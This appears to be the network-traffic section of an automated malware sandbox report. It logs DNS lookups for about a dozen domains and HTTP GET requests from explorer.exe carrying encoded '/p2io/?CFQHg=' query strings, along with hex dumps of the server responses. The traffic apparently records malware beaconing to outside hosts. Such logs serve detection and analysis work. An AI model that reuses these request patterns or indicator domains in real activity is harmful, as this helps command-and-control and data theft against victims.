                                                                      Jun 10, 2021 18:06:54.740502119 CEST5370053192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:54.790579081 CEST53537008.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:55.572715998 CEST5172653192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:55.633346081 CEST53517268.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:56.539563894 CEST5679453192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:56.592868090 CEST53567948.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:58.646500111 CEST5653453192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:58.697787046 CEST53565348.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:59.822455883 CEST5662753192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:59.872442007 CEST53566278.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:01.604384899 CEST5662153192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:01.663435936 CEST53566218.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:02.504225016 CEST6311653192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:02.554306984 CEST53631168.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:03.592953920 CEST6407853192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:03.642983913 CEST53640788.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:10.800828934 CEST6480153192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:10.859791994 CEST53648018.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:32.513550043 CEST6172153192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:32.574834108 CEST53617218.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:33.608347893 CEST5125553192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:33.668716908 CEST53512558.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:34.408015013 CEST6152253192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:34.469630003 CEST53615228.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:34.636287928 CEST5233753192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:34.698220015 CEST53523378.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:35.500509024 CEST5504653192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:35.562103033 CEST53550468.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:36.458476067 CEST4961253192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:36.498214960 CEST4928553192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:36.519891024 CEST53496128.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:36.559676886 CEST53492858.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:37.769285917 CEST5060153192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:37.835247993 CEST53506018.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:38.574868917 CEST6087553192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:38.636751890 CEST53608758.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:42.846527100 CEST5644853192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:42.902825117 CEST53564488.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:44.378021955 CEST5917253192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:44.431400061 CEST53591728.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:48.740762949 CEST6242053192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:48.794127941 CEST53624208.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:51.238238096 CEST6057953192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:51.297835112 CEST53605798.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:54.095107079 CEST5018353192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:54.157947063 CEST53501838.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:07:59.578603029 CEST6153153192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:07:59.925715923 CEST53615318.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:05.635307074 CEST4922853192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:05.848440886 CEST53492288.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:11.596757889 CEST5979453192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:11.660926104 CEST53597948.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:17.074579000 CEST5591653192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:17.316402912 CEST53559168.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:22.765113115 CEST5275253192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:22.930680990 CEST53527528.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:28.274285078 CEST6054253192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:28.334353924 CEST53605428.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:28.716119051 CEST6068953192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:28.787224054 CEST53606898.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:30.174724102 CEST6420653192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:30.241816044 CEST53642068.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:34.191879034 CEST5090453192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:34.281604052 CEST53509048.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:39.533937931 CEST5752553192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:39.601340055 CEST53575258.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:45.041973114 CEST5381453192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:45.102824926 CEST53538148.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:50.419904947 CEST5341853192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:50.479913950 CEST53534188.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:08:55.608623981 CEST6283353192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:08:55.671185970 CEST53628338.8.8.8192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Jun 10, 2021 18:07:54.095107079 CEST192.168.2.48.8.8.80x3a99Standard query (0)www.balloon-artists.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:07:59.578603029 CEST192.168.2.48.8.8.80x5f1eStandard query (0)www.adultpeace.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:05.635307074 CEST192.168.2.48.8.8.80xd68Standard query (0)www.cmannouncements.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:11.596757889 CEST192.168.2.48.8.8.80x42f5Standard query (0)www.leonardocarrillo.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:17.074579000 CEST192.168.2.48.8.8.80xd9bdStandard query (0)www.dreamcashbuyers.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:22.765113115 CEST192.168.2.48.8.8.80x4cf8Standard query (0)www.swayam-moj.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:28.274285078 CEST192.168.2.48.8.8.80x8ca5Standard query (0)www.hfjxhs.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:34.191879034 CEST192.168.2.48.8.8.80xa57fStandard query (0)www.defenestration.worldA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.533937931 CEST192.168.2.48.8.8.80x5c24Standard query (0)www.boogerstv.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:45.041973114 CEST192.168.2.48.8.8.80x4fdStandard query (0)www.totally-seo.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:50.419904947 CEST192.168.2.48.8.8.80xdc7dStandard query (0)www.cleanxcare.comA (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:55.608623981 CEST192.168.2.48.8.8.80xb13Standard query (0)www.myfavbutik.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Jun 10, 2021 18:07:54.157947063 CEST8.8.8.8192.168.2.40x3a99No error (0)www.balloon-artists.com147.255.162.204A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:07:59.925715923 CEST8.8.8.8192.168.2.40x5f1eNo error (0)www.adultpeace.comadultpeace.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 10, 2021 18:07:59.925715923 CEST8.8.8.8192.168.2.40x5f1eNo error (0)adultpeace.com163.44.239.73A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:05.848440886 CEST8.8.8.8192.168.2.40xd68No error (0)www.cmannouncements.com74.220.199.8A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:11.660926104 CEST8.8.8.8192.168.2.40x42f5No error (0)www.leonardocarrillo.com172.107.55.6A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:17.316402912 CEST8.8.8.8192.168.2.40xd9bdNo error (0)www.dreamcashbuyers.comsites.propelio.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 10, 2021 18:08:17.316402912 CEST8.8.8.8192.168.2.40xd9bdNo error (0)sites.propelio.comsites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 10, 2021 18:08:17.316402912 CEST8.8.8.8192.168.2.40xd9bdNo error (0)sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com54.69.66.227A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:17.316402912 CEST8.8.8.8192.168.2.40xd9bdNo error (0)sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com18.236.1.157A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:17.316402912 CEST8.8.8.8192.168.2.40xd9bdNo error (0)sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com34.215.222.250A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:22.930680990 CEST8.8.8.8192.168.2.40x4cf8No error (0)www.swayam-moj.comswayam-moj.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 10, 2021 18:08:22.930680990 CEST8.8.8.8192.168.2.40x4cf8No error (0)swayam-moj.com199.195.117.147A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:28.334353924 CEST8.8.8.8192.168.2.40x8ca5No error (0)www.hfjxhs.com156.241.53.161A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:34.281604052 CEST8.8.8.8192.168.2.40xa57fNo error (0)www.defenestration.world99.83.154.118A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)www.boogerstv.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:39.601340055 CEST8.8.8.8192.168.2.40x5c24No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:45.102824926 CEST8.8.8.8192.168.2.40x4fdNo error (0)www.totally-seo.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 10, 2021 18:08:45.102824926 CEST8.8.8.8192.168.2.40x4fdNo error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:45.102824926 CEST8.8.8.8192.168.2.40x4fdNo error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:45.102824926 CEST8.8.8.8192.168.2.40x4fdNo error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:45.102824926 CEST8.8.8.8192.168.2.40x4fdNo error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:50.479913950 CEST8.8.8.8192.168.2.40xdc7dNo error (0)www.cleanxcare.comcleanxcare.comCNAME (Canonical name)IN (0x0001)
                                                                      Jun 10, 2021 18:08:50.479913950 CEST8.8.8.8192.168.2.40xdc7dNo error (0)cleanxcare.com78.31.67.91A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:55.671185970 CEST8.8.8.8192.168.2.40xb13No error (0)www.myfavbutik.com104.21.15.16A (IP address)IN (0x0001)
                                                                      Jun 10, 2021 18:08:55.671185970 CEST8.8.8.8192.168.2.40xb13No error (0)www.myfavbutik.com172.67.161.4A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.balloon-artists.com
                                                                      • www.adultpeace.com
                                                                      • www.cmannouncements.com
                                                                      • www.leonardocarrillo.com
                                                                      • www.dreamcashbuyers.com
                                                                      • www.swayam-moj.com
                                                                      • www.hfjxhs.com
                                                                      • www.defenestration.world
                                                                      • www.boogerstv.com
                                                                      • www.totally-seo.com
                                                                      • www.cleanxcare.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.449763147.255.162.20480C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:07:54.360044956 CEST4940OUTGET /p2io/?CFQHg=/DMwn9vTy70wY8Gt9syYwdBt6sFcRXVvValBDdDX8KtazsYeLKsYeQz2+d78EfQIVSnp&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.balloon-artists.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:07:54.556164026 CEST4940INHTTP/1.1 200 OK
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Server: Nginx Microsoft-HTTPAPI/2.0
                                                                      X-Powered-By: Nginx
                                                                      Date: Thu, 10 Jun 2021 16:07:51 GMT
                                                                      Connection: close
                                                                      Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                      Data Ascii: 3
                                                                      Jun 10, 2021 18:07:54.556201935 CEST4941INData Raw: 31 30 37 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e5 ae 89 e5 85 a8 e6 a3 80 e6 b5 8b 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c
                                                                      Data Ascii: 1072<!DOCTYPE html><html><head> <title>...</title> <meta charset=UTF-8 /> <meta http-equiv=Cache-Control content=no-siteapp /> <meta http-equiv=Cache-Control content=no-transform /> <meta name=applicab
                                                                      Jun 10, 2021 18:07:54.556276083 CEST4943INData Raw: 61 63 69 6e 67 3a 32 70 78 7d 2e 61 6c 65 72 74 2d 62 74 6e 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 35 36 35 36 7d 2e 61 6c 65 72 74 2d 66 6f 6f 74 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 68 65
                                                                      Data Ascii: acing:2px}.alert-btn:hover{background-color:#ff5656}.alert-footer{margin:0 auto;height:42px;text-align:center;width:100%;margin-bottom:10px}.alert-footer-icon{float:left}.alert-footer-text{float:left;border-left:2px solid #eee;padding:3px 0 0
                                                                      Jun 10, 2021 18:07:54.556405067 CEST4944INData Raw: 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72
                                                                      Data Ascii: var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> <script> var _hmt = _hmt || []; (function () { var hm = document.createElement("scrip
                                                                      Jun 10, 2021 18:07:54.556427956 CEST4944INData Raw: 61 64 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 73 74 72 31 3b 0a 20 20 20 20 20 20 20 20 62 74 6e 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 62 74 6e 54 65 78 74 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e
                                                                      Data Ascii: ad").innerHTML = str1; btn.innerHTML = btnText; </script> <script> var _0x29af=['W4xcR2BdTmkbEJa','gmoeW4JdUbq','q8kHz8kbW7b1jKe','WPPxshBcPL/cRq','WPjIxInKW5b2W7S','Bmk8j8kjd8kf


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.449764163.44.239.7380C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:00.232477903 CEST4968OUTGET /p2io/?CFQHg=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.adultpeace.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:00.626985073 CEST4969INHTTP/1.1 301 Moved Permanently
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Expires: Thu, 10 Jun 2021 17:08:00 GMT
                                                                      Cache-Control: max-age=3600
                                                                      X-Redirect-By: WordPress
                                                                      Location: http://adultpeace.com/p2io/?CFQHg=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&Pr980v=G2MtWNVHS
                                                                      Content-Length: 0
                                                                      Date: Thu, 10 Jun 2021 16:08:00 GMT
                                                                      Server: LiteSpeed


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      10192.168.2.44977578.31.67.9180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:50.534192085 CEST5022OUTGET /p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.cleanxcare.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:50.589107037 CEST5023INHTTP/1.1 301 Moved Permanently
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Content-Length: 707
                                                                      Date: Thu, 10 Jun 2021 16:08:50 GMT
                                                                      Location: https://www.cleanxcare.com/p2io/?CFQHg=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YLJeQ+Gz7y&Pr980v=G2MtWNVHS
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Vary: User-Agent
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.44976574.220.199.880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:06.041508913 CEST4969OUTGET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.cmannouncements.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:06.536820889 CEST4970OUTGET /p2io/?CFQHg=wzEdtbrCY4VKdG4P/h093gtD2EzP1yO8zPZJPXBkhd23ZEiSfiVlmlbiUjAoERCVF5eV&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.cmannouncements.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:06.724903107 CEST4971INHTTP/1.1 200 OK
                                                                      Date: Thu, 10 Jun 2021 16:08:06 GMT
                                                                      Server: Apache/2.2.31 (CentOS)
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: text/html; charset=ISO-8859-1
                                                                      Data Raw: 31 35 33 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 20 63 6d 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 73 2e 63 6f 6d 20 2d 20 48 6f 73 74 6d 6f 6e 73 74 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 68 6f 73 74 6d 6f 6e 73 74 65 72 2e 63 6f 6d 2f 6d 65 64 69 61 2f 73 68 61 72 65 64 2f 69 6e 66 6f 2f 69 6e 64 65 78 2f 5f 68 6d 2f 68 6f 6d 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 68 6f 73 74 6d 6f 6e 73 74 65 72 2e 63 6f 6d 2f 6d 65 64 69 61 2f 73 68 61 72 65 64 2f 67 65 6e 65 72 61 6c 2f 5f 68 6d 2f 68 6f 6d 65 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 77 77 77 2e 68 6f 73 74 6d 6f 6e 73 74 65 72 2e 63 6f 6d 2f 6d 65 64 69 61 2f 73 68 61 72 65 64 2f 67 65 6e 65 72 61 6c 2f 5f 68 6d 2f 68 6f 6d 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2e 72 6f 6c 6c 6f 76 65 72 20 61 20 7b 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 20 68 65 69 67 68 74 3a 32 37 70 78 3b 77 69 64 74 68 3a 31 34 30 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 2f 77 77 77 2e 68 6f 73 74 6d 6f 6e 73 74 65 72 2e 63 6f 6d 2f 6d 65 64 69 61 2f 73 68 61 72 65 64 2f 67 65 6e 65 72 61 6c 2f 5f 68 6d 2f 63 70 6c 6f 67 69 6e 2e 67 69 66 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 20 30 3b 7d 20 0a 2e 72 6f 6c 6c 6f 76 65 72 20 61 3a 68 6f 76 65 72 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 2f 77 77 77 2e 68 6f 73 74 6d 6f 6e 73 74 65 72 2e 63 6f 6d 2f 6d 65 64 69 61 2f 73 68 61 72 65 64 2f 67 65 6e 65 72 61 6c 2f 5f 68 6d 2f 63 70 6c 6f 67 69 6e 